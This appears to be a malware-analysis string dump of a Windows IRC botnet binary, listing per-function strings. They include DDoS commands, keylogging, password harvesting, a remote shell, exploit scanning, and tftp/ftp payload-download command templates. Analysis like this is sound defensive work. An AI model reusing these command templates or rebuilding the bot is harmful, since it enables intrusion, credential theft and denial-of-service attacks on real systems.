sub_4023A7(01ee):
	"%s (Changed Windows: %s)"
	"b"
	"%s (Buffer full) (%s)"
	"%s (Return)	(%s)"

sub_40AB7C(034d):
	"explorer.exe"

sub_40DF4E(0456):
	"Account: %S"
	"Full Name:	%S"
	"User Comment: %S"
	"Comment: %S"
	"Unknown"
	"Administrator"
	"User"
	"Guest"
	"Privilege Level: %s"
	"Auth Flags: %d"
	"Home Directory: %S"
	"Parameters: %S"
	"Password Age: %d"
	"Bad Password Count: %d"
	"Number of Logins: %d"
	"Last Logon: %d"
	"Last Logoff: %d"
	"Logon Server: %S"
	"Country	Code: %d"
	"User's Language: %d"
	"Max. Storage: %d"

sub_40CAF1(0a22):
	"open"

sub_4085B3(0c18):
	"DISPLAY"

sub_4022C6(0d86):
	"\\"
	"ab"
	"[%d-%d-%d %d:%d:%d] %s\r\n"

sub_407767(1a12):
	"dcom135"

sub_405144(1c5c):
	"echo open %s %d > o&echo user	1 1 >> o "...

sub_4162AC(2156):
	"Software\\Microsoft\\OLE"
	"EnableDCOM"
	"SYSTEM\\CurrentControlSet\\Control\\Lsa"
	"restrictanonymous"
	"%c$"
	"%c:\\"

sub_415C5E(2242):
	"mIRC"

sub_40762E(22a3):
	"%d.%d.%d.%d"

sub_405A58(2a41):
	"rb"

sub_4010B5(2a80):
	"ddos.syn"
	"ddos.ack"
	"ddos.random"

sub_4087EE(2bb5):
	"Window"

sub_409037(2bcd):
	"SeDebugPrivilege"
	"NTDLL.DLL"
	"NtQuerySystemInformation"
	"RtlCreateQueryDebugBuffer"
	"RtlQueryProcessDebugInformation"
	"RtlDestroyQueryDebugBuffer"
	"RtlRunDecodeUnicodeString"
	"SeDebugPrivilege"

sub_402688(30be):
	"[PSNIFF]"

sub_40C259(3339):
	"rb"

sub_401831(36a5):
	"[SUPERSYN]: Done with	flood (%iKB/sec)"

sub_404F9A(37e9):
	WS2_32.recv

	"cmd /c echo open %s %d >> ii &echo user"...

sub_406C19(3aee):
	"octet"
	"rb"

sub_40DCE6(3fe3):
	"Share	name:	 Resource:		 "...
	"Yes"
	"No"
	"%-14S %-24S %-6u %-4s"

sub_408C26(442b):
	"%s\\%s"
	"r"
	"="
	"="

sub_42105F(4bef):
	"user32.dll"
	"MessageBoxA"
	"GetActiveWindow"
	"GetLastActivePopup"

sub_40C8B4(4e39):
	"%s%s"
	"a+b"

sub_41C96D(502f):
	"e+000"

sub_40D12A(5886):
	"%sKB"
	"failed"

sub_4029E9(5a6d):
	"\\\\"

sub_40D679(5ad2):
	"NOTICE"
	"PRIVMSG"
	"%s"

sub_4041D4(5f99):
	"GET /	HTTP/1.0\r\nHost: %s\r\nAuthorization"...

sub_422863(5fbb):
	"invalid string position"

sub_4219A9(6338):
	"1#SNAN"
	"1#IND"
	"1#INF"
	"1#QNAN"

sub_40D835(6353):
	"The specified	service	name is	invalid."
	"The requested	control	code is	undefined"...
	"The handle is	invalid."
	"The handle does not have the required	a"...
	"The service binary file could	not be fo"...
	"The service cannot be	stopped	because	o"...
	"The database is locked."
	"A thread could not be	created	for the	s"...
	"The process for the service was started"...
	"The requested	control	code is	not valid"...
	"An instance of the service is	already	r"...
	"The system is	shutting down."
	"An unknown error occurred: <%ld>"

sub_405F4D(6557):
	"text/html"
	"application/octet-stream"
	"ddd, dd	MMM yyyy"
	"HH:mm:ss"
	"HTTP/1.0 200 OK\r\nServer: myBot\r\nCache-C"...
	"HTTP/1.0 200 OK\r\nServer: myBot\r\nCache-C"...

sub_40B56C(6c22):
	"cmd.exe"

sub_4060D0(6ca2):
	"\\%s"
	"%s"
	"%s%s"
	"\n"
	"*"

sub_4089E7(6f62):
	"Window"

sub_4030E8(706b):
	"tftp -i %s get %s\r\n"
	"echo open %s %d > o&echo user	1 1 >> o "...

sub_42094E(7e1a):
	"TZ"

sub_416FEA(8732):
	"%s: %s stopped. (%d thread(s)	stopped.)"...
	"%s: No %s thread found."

sub_40ECFA(8c86):
	"PASS	%s\r\n"

sub_41F885(904b):
	""
	"..."
	"Runtime Error!\n\nProgram: "
	"\n\n"
	"Microsoft Visual C++ Runtime Library"

sub_40AC42(90bd):
	"%sdel.bat"
	"@echo	off\r\n:repeat\r\ndel \"%%1\"\r\nif exist"...
	"%%comspec%% /c %s	%s"

sub_40AA35(951b):
	"%s	Error: %s <%d>."

sub_40B8D8(9810):
	"95"
	"NT"
	"98"
	"ME"
	"2K"
	"XP"
	"2003"
	"couldn't resolve host"
	"dd:MMM:yyyy"
	"HH:mm:ss"
	"[SYSINFO]: [CPU]: %I64uMHz. [RAM]: %sKB"...

sub_40E4B7(9bb4):
	"Invalid parameter."
	"Server name not found."
	"This network request is not supported."
	"Not enough memory."
	"The name is invalid."
	"Duplicate share name."
	"Invalid for redirected resource."
	"Device or directory does not exist."
	"Level	parameter is invalid."
	"A general failure occurred in	the netwo"...
	"The operation	is allowed only	on the pr"...
	"The user account already exists."
	"The group already exists."
	"The password is shorter than required	("...
	"An unknown error occurred."
	"The computer name is invalid."
	"Share	not found."
	"The user name	could not be found."
	"Network connection not found."

sub_40AC20(9dbe):
	"SeShutdownPrivilege"

sub_40C351(9e51):
	"\n"

sub_409209(a694):
	"WINLOGON"
	"NWGINA"
	"MSGINA"

sub_40E337(a909):
	"Username accounts for	local system:"
	"  %S"
	"Total	users found: %d."

sub_41C846(aba6):
	"KERNEL32"
	"IsProcessorFeaturePresent"

sub_40A4AC(ac3c):
	"Kernel32.dll failed. <%d>"
	"User32.dll failed. <%d>"
	"Advapi32.dll failed. <%d>"
	"Gdi32.dll failed. <%d>"
	"Ws2_32.dll failed. <%d>"
	"Wininet.dll failed. <%d>"
	"Icmp.dll failed. <%d>"
	"Netapi32.dll failed. <%d>"
	"Dnsapi.dll failed. <%d>"
	"Iphlpapi.dll failed. <%d>"
	"Mpr32.dll failed. <%d>"
	"Shell32.dll failed. <%d>"
	"Odbc32.dll failed. <%d>"
	"Avicap32.dll failed. <%d>"

sub_40D099(b2db):
	"Cdrom"
	"Network"
	"Disk"
	"Invalid"
	"Unknown"

sub_402ACC(b883):
	"\\\\"

sub_407110(bb8e):
	" %s:	%d,"
	" Total: %d in %s."

sub_401D82(be49):
	"syn"
	"ack"
	"random"

sub_415996(c691):
	"[bot]-"
	"%s"

sub_40981F(c69e):
	"kernel32.dll"
	"SetErrorMode"
	"CreateToolhelp32Snapshot"
	"Process32First"
	"GetDiskFreeSpaceExA"
	"GetLogicalDriveStringsA"
	"SearchPathA"
	"QueryPerformanceCounter"
	"QueryPerformanceFrequency"
	"RegisterServiceProcess"
	"user32.dll"
	"SendMessageA"
	"FindWindowA"
	"IsWindow"
	"GetClipboardData"
	"CloseClipboard"
	"GetAsyncKeyState"
	"GetKeyState"
	"GetWindowTextA"
	"GetForegroundWindow"
	"advapi32.dll"
	"RegCreateKeyExA"
	"RegSetValueExA"
	"RegQueryValueExA"
	"RegDeleteValueA"
	"RegCloseKey"
	"OpenProcessToken"
	"LookupPrivilegeValueA"
	"AdjustTokenPrivileges"
	"OpenSCManagerA"
	"OpenServiceA"
	"ControlService"
	"CloseServiceHandle"
	"EnumServicesStatusA"
	"IsValidSecurityDescriptor"
	"GetUserNameA"
	"gdi32.dll"
	"CreateDCA"
	"CreateDIBSection"
	"CreateCompatibleDC"
	"GetDIBColorTable"
	"SelectObject"
	"BitBlt"
	"DeleteDC"
	"DeleteObject"
	"ws2_32.dll"
	"WSAStartup"
	"WSASocketA"
	"WSAAsyncSelect"
	"__WSAFDIsSet"
	"WSAIoctl"
	"WSAGetLastError"
	"WSACleanup"
	"socket"
	"ioctlsocket"
	"connect"
	"inet_ntoa"
	"inet_addr"
	"htons"
	"htonl"
	"ntohs"
	"ntohl"
	"send"
	"sendto"
	"recv"
	"recvfrom"
	"bind"
	"select"
	"listen"
	"accept"
	"setsockopt"
	"getsockname"
	"gethostname"
	"getpeername"
	"closesocket"
	"wininet.dll"
	"InternetGetConnectedState"
	"InternetGetConnectedStateEx"
	"HttpOpenRequestA"
	"HttpSendRequestA"
	"InternetConnectA"
	"InternetOpenUrlA"
	"InternetCrackUrlA"
	"InternetReadFile"
	"InternetCloseHandle"
	"Mozilla/4.0 (compatible)"
	"icmp.dll"
	"IcmpCreateFile"
	"IcmpCloseHandle"
	"IcmpSendEcho"
	"netapi32.dll"
	"NetShareAdd"
	"NetShareDel"
	"NetShareEnum"
	"NetScheduleJobAdd"
	"NetApiBufferFree"
	"NetRemoteTOD"
	"NetUserAdd"
	"NetUserDel"
	"NetUserEnum"
	"NetUserGetInfo"
	"NetMessageBufferSend"
	"dnsapi.dll"
	"DnsFlushResolverCache"
	"DnsFlushResolverCacheEntry_A"
	"iphlpapi.dll"
	"DeleteIpNetEntry"
	"mpr.dll"
	"WNetAddConnection2A"
	"WNetAddConnection2W"
	"WNetCancelConnection2A"
	"WNetCancelConnection2W"
	"shell32.dll"
	"SHChangeNotify"
	"odbc32.dll"
	"SQLDriverConnect"
	"SQLAllocHandle"
	"avicap32.dll"
	"capCreateCaptureWindowA"
	"capGetDriverDescriptionA"

sub_40B390(c9c3):
	"PRIVMSG %s	:%s\r"
	"%s"

sub_40BB8C(cf39):
	"[NETINFO]: [Type]: %s	(%s). [IP Address"...

sub_4053D5(d002):
	WS2_32.send

	"220 NzmxFtpd 0wns j0\n"
	"%s %s"
	"USER"
	"331 Password required\n"
	"PASS"
	"230 User logged in.\n"
	"SYST"
	"215 NzmxFtpd\n"
	"REST"
	"350 Restarting.\n"
	"257 \"/\" is current directory.\n"
	"TYPE"
	"A"
	"200 Type set to A.\n"
	"TYPE"
	"I"
	"200 Type set to I.\n"
	"PASV"
	"425 Passive not supported on this serve"...
	"LIST"
	"226 Transfer complete\n"
	"PORT"
	"%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^\n]"...
	"%x%x\n"
	"%s.%s.%s.%s"
	"200 PORT command successful.\n"
	"RETR"
	"150 Opening BINARY mode data connection"...
	"226 Transfer complete.\n"
	"425 Can't open data connection.\n"
	"QUIT"
	"221 Goodbye happy r00ting.\n"

sub_408EE5(d372):
	"%s\\*"
	"%s\\%s"
	" Found: %s\\%s"

sub_416810(d61a):
	"cmd /q"

sub_415F88(d7b4):
	"Software\\Microsoft\\OLE"
	"EnableDCOM"
	"SYSTEM\\CurrentControlSet\\Control\\Lsa"
	"restrictanonymous"

sub_40D320(dc5b):
	"A:\\"

sub_40AAFA(dcfe):
	"mIRC"

sub_40AEE0(e076):
	"%d.%d.%d.%d"

sub_406AF8(e1a1):
	"%s %s	HTTP/1.1\nReferer: %s\nHost: %s\nCon"...

sub_40BF6D(e4b2):
	"[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s"

sub_41518A(e9c8):
	"SeDebugPrivilege"
	" %s (%d)"
	"SeDebugPrivilege"

sub_40B721(f0d9):
	"%dd %dh %dm"

sub_405AF2(f1a3):
	"GET	"
	" "
	"\r\n"

sub_403A90(f1cc):
	"CCCC"

sub_40D9B3(f2dd):
	"The following	Windows	services are regi"...
	"	 Unknown"
	"	 Paused"
	"    Pausing"
	" Continuing"
	"    Running"
	"    Stoping"
	"   Starting"
	"    Stopped"
	"%s: %s (%s)"

sub_40D24E(f5ac):
	"failed"

sub_40EE72(f75f):
	" :"
	" "
	"!"
	"PING"
	"PONG	%s\r\n"
	"JOIN	%s %s\r\n"
	"001"
	"005"
	"302"
	"@"
	"433"
	"NICK	%s\r\n"
	"KICK"
	"NOTICE %s :%s\r\n"
	"JOIN	%s %s\r\n"
	"NICK"
	":%s%s"
	"PART"
	"QUIT"
	"353"
	"PART"
	"NOTICE %s :%s\r\n"
	"PRIVMSG"
	"NOTICE"
	"SEND"
	"%s"
	"%s has just versioned	me."
	"CHAT"
	"%s"
	"c"
	" :"
	"$%d-"
	"$%d"
	"$me"
	"$user"
	"$chan"
	"$rndnick"
	"$server"
	"$chr("
	")"
	"63"
	" "
	" "
	"irc.rndnick"
	"rn"
	"irc.die"
	"irc.di"
	"irc.logout"
	"lo"
	"irc.version"
	"ver"
	"lockdown.on"
	"ld.on"
	"lockdown.off"
	"ld.off"
	"proxy.socks4.on"
	"proxy.s4.on"
	"proxy.socks4.off"
	"Server"
	"daemon.rlogin.off"
	"Server"
	"Server"
	"proxy.redirect.off"
	"daemon.tftp.off"
	"Server"
	"util.findfile.off"
	"util.ff.off"
	"com.ps.off"
	"clone.off"
	"Clone"
	"Secure"
	"root.stop"
	"Scan"
	"Exploitation"
	"root.stats"
	"root.st"
	"irc.r"
	"irc.disconnect"
	"irc.d"
	"irc.quit"
	"irc.q"
	"irc.status"
	"irc.s"
	"irc.id"
	"irc.i"
	"com.rebewt"
	"threads.list"
	"threads.l"
	"irc.aliases"
	"irc.al"
	"irc.log"
	"irc.lg"
	"util.clg"
	"com.netinfo"
	"com.ni"
	"com.sysinfo"
	"com.si"
	"irc.rem0ve"
	"irc.rm0"
	"com.procs"
	"com.ps"
	"com.harvest"
	"com.key"
	"com.uptime"
	"com.up"
	"com.drv"
	"com.testdlls"
	"com.dll"
	"com.opencmd"
	"com.ocmd"
	"com.ocmd.off"
	"Remote shell"
	"[CMD]"
	"irc.who"
	"-[Login List]-"
	""
	"%d. %s"
	"com.getclip"
	"com.gc"
	"util.farp"
	"util.fdns"
	"root.currentip"
	"root.cip"
	"daemon.rlogin.on"
	"daemon.rl.on"
	"daemon.httpd.on"
	"daemon.tftp.on"
	"daemon.tf.on"
	"com.findpass"
	"com.fp"
	"asc"
	"sa"
	"irc.nick"
	"irc.n"
	"irc.join"
	"irc.j"
	"irc.part"
	"irc.pt"
	"irc.raw"
	"irc.ra"
	"threads.kill"
	"threads.k"
	"clone.quit"
	"clone.q"
	"clone.rn"
	"irc.prefix"
	"irc.pr"
	"com.open"
	"com.o"
	"irc.setserve"
	"irc.se"
	"irc.dns"
	"irc.dn"
	"com.killprocname"
	"com.kpn"
	"com.prockillid"
	"com.pkid"
	"com.delete"
	"com.del"
	"dcc.get"
	"dcc.gt"
	"com.filelist"
	"com.fl"
	"irc.visit"
	"irc.v"
	"mirc.cmd"
	"mirc.cmd"
	"com.cmd"
	"com.cm"
	"com.readfile"
	"com.rf"
	"sniff"
	"on"
	"#f"
	"off"
	"com.keylog"
	"on"
	"file"
	"off"
	"file"
	"#f"
	"com.net"
	"start"
	"stop"
	"pause"
	"continue"
	"delete"
	"share"
	"user"
	"send"
	"%s"
	"com.capture"
	"com.cap"
	"irc.gethost"
	"irc.gh"
	"irc.addalias"
	"irc.aa"
	"irc.privmsg"
	"irc.pm"
	"irc.action"
	"irc.ac"
	"irc.cycle"
	"irc.cy"
	"irc.mode"
	"irc.m"
	"clone.raw"
	"clone.ra"
	"clone.mode"
	"clone.m"
	"clone.nick"
	"clone.ni"
	"clone.join"
	"clone.j"
	"clone.part"
	"clone.p"
	"irc.repeat"
	"irc.rp"
	"irc.delay"
	"irc.de"
	"download.update"
	"download.up"
	"com.execute"
	"com.e"
	"findfile"
	"ff"
	"com.rename"
	"com.mv"
	"ddos.icmp"
	"ddos.ic"
	"clone.make"
	"clone.start"
	"ddos.syn"
	"ddos.ack"
	"ddos.random"
	"ddos.synf"
	"download.wg"
	"daemon.redirect"
	"daemon.rd"
	"root.ps"
	"clone.pm"
	"clone.action"
	"clone.ac"
	"advscan"
	"adv"
	"ddos.udpf"
	"u"
	"ddos.pingflood"
	"ddos.pingf"
	"p"
	"ddos.tcpf"
	"util.email"
	" "
	"_"
	"helo $rndnick\nmail from: <%s>\nrcpt to: "...
	"util.httpcon"
	"util.hcon"
	"ftp.upload"
	"%s\\%i%i%i.dll"
	"ab"
	"open %s\r\n%s\r\n%s\r\n%s\r\nput %s\r\nbye\r\n"
	"-s:%s"
	"ftp.exe"
	"open"
	"syn"
	"ack"
	"random"
	"Spoofed"
	"Normal"
	"ICMP.dll not available"
	"#f"
	"Sequential"
	"[%s]	* %s %s"
	"[%s]	<%s> %s"
	"botid"
	"%s%s.exe"
	"repeat"
	"MODE	%s\r\n"
	"JOIN	%s %s\r\n"
	"screen"
	"drivers"
	"frame"
	"video"
	"r"
	"\n"
	"%s"
	"open"
	"QUIT :later\r\n"
	"all"
	"JOIN	%s %s\r\n"
	"NICK	%s\r\n"
	"#f"
	"#f"
	"Sequential"
	"full"
	"%s"
	"botid"
	"QUIT	:%s\r\n"
	"QUIT :later\r\n"
	"QUIT :disconnecting\r\n"
	"QUIT :reconnecting\r\n"
	"secure"
	"sec"
	"Unsecuring"
	"ABOSAL7 tool"
	"NICK	%s\r\n"
	"!"
	"~"
	"cool"
	"NOTICE %s :Nice try, idiot. (%s!%s).\r\n"
	"NOTICE %s :You've been logged.\r\n"
	"NOTICE %s :Nice try, idiot. (%s!%s).\r\n"
	"NOTICE %s :You've been logged.\r\n"
	"cool"
	"USERHOST %s\r\n"
	"+xi"
	"MODE	%s %s\r\n"
	"JOIN	%s %s\r\n"

sub_406387(fe63):
	"\n"
	"PRIVMSG %s :Searching	for: %s\r\n"
	"\r\n\r\nIndex of %s</TIT"...
	"<H1>Index of %s</H1>\r\n<TABLE BORDER=\"0\""...
	"<TR>\r\n<TD WIDTH=\"%d\"><CODE>Name</CODE><"...
	"<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"...
	"<TR>\r\n<TD COLSPAN=\"3\"><A HREF=\"%s\"><COD"...
	".."
	"."
	"PM"
	"AM"
	"%2.2d/%2.2d/%4d  %2.2d:%2.2d %s"
	"<%s>"
	"PRIVMSG %s :%-31s  %-21s\n"
	"<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\""
	"%s%s/"
	"\"><CODE>%.29s>/</CODE></A>"
	"\"><CODE>%s/</CODE></A>"
	"</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"...
	"<%s>"
	"%-31s  %-21s\r\n"
	"PRIVMSG %s :%-31s  %-21s (%s bytes)\n"
	"<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\""
	"%s%s"
	"\"><CODE>%.30s></CODE></A>"
	"\"><CODE>%s</CODE></A>"
	"</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"...
	"%-31s  %-21s (%i bytes)\r\n"
	"PRIVMSG %s :Found %s Files and %s Direc"...
	"<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"...
	"Found: %i Files and %i Directories\r\n"
</font></pre></td></tr></table><script>
document.getElementById(window.location.href.split('#')[1]).setAttribute("style", "background-color:#ddddff");
</script>
</html>